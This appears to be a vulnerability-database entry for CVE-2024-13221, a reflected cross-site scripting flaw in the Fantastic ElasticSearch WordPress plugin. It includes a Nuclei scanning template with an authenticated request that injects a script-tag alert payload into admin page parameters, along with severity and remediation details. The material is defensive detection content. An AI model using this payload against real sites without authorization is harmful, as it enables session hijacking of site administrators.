Fantastic ElasticSearch Plugin <= 4.1.0 - Cross-Site Scripting
CVE-2024-13221
Verified
Description
Fantastic ElasticSearch WordPress plugin <= 4.1.0 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in the context of high privilege users, exploit requires victim to visit a malicious link.
Severity
Medium
CVSS Score
6.1
Exploit Probability
2%
Affected Product
fantastic_elasticsearch
Published Date
February 6, 2026
Template Author
sourabh-sahu
CVE-2024-13221.yaml
id: CVE-2024-13221
info:
name: Fantastic ElasticSearch Plugin <= 4.1.0 - Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
Fantastic ElasticSearch WordPress plugin <= 4.1.0 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in the context of high privilege users, exploit requires victim to visit a malicious link.
impact: |
Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
remediation: |
Update to version 4.1.1 or later where input sanitization and escaping are properly implemented.
reference:
- https://wpscan.com/vulnerability/693f4cc4-a082-46bc-abc9-a08919f70157/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13221
cwe-id: CWE-79
epss-score: 0.01546
epss-percentile: 0.81628
cpe: cpe:2.3:a:parisholley:fantastic_elasticsearch:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: parisholley
product: fantastic_elasticsearch
tags: cve,cve2024,fantastic-elasticsearch,wordpress,wp,wp-plugin,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=elastic_search&tab=index"></script><script>alert(document.domain)</script><script>&action=testxss"></script><script>alert(document.domain)</script><script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body, "></script><script>alert(document.domain)</script><script>", "ElasticSearch")
- contains(content_type, "text/html")
- status_code == 200
condition: and
# digest: 4b0a00483046022100a745c179d63df1beb9ee474117610a7f7956d1da97bb2f160a366957c90c5e34022100a2fcb96a64a6a52712fb9182c717f671ce6ba0f8d7bf4c13274d55c9c121d313:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13221
CWE ID:
cwe-79
Remediation Steps
Update to version 4.1.1 or later where input sanitization and escaping are properly implemented.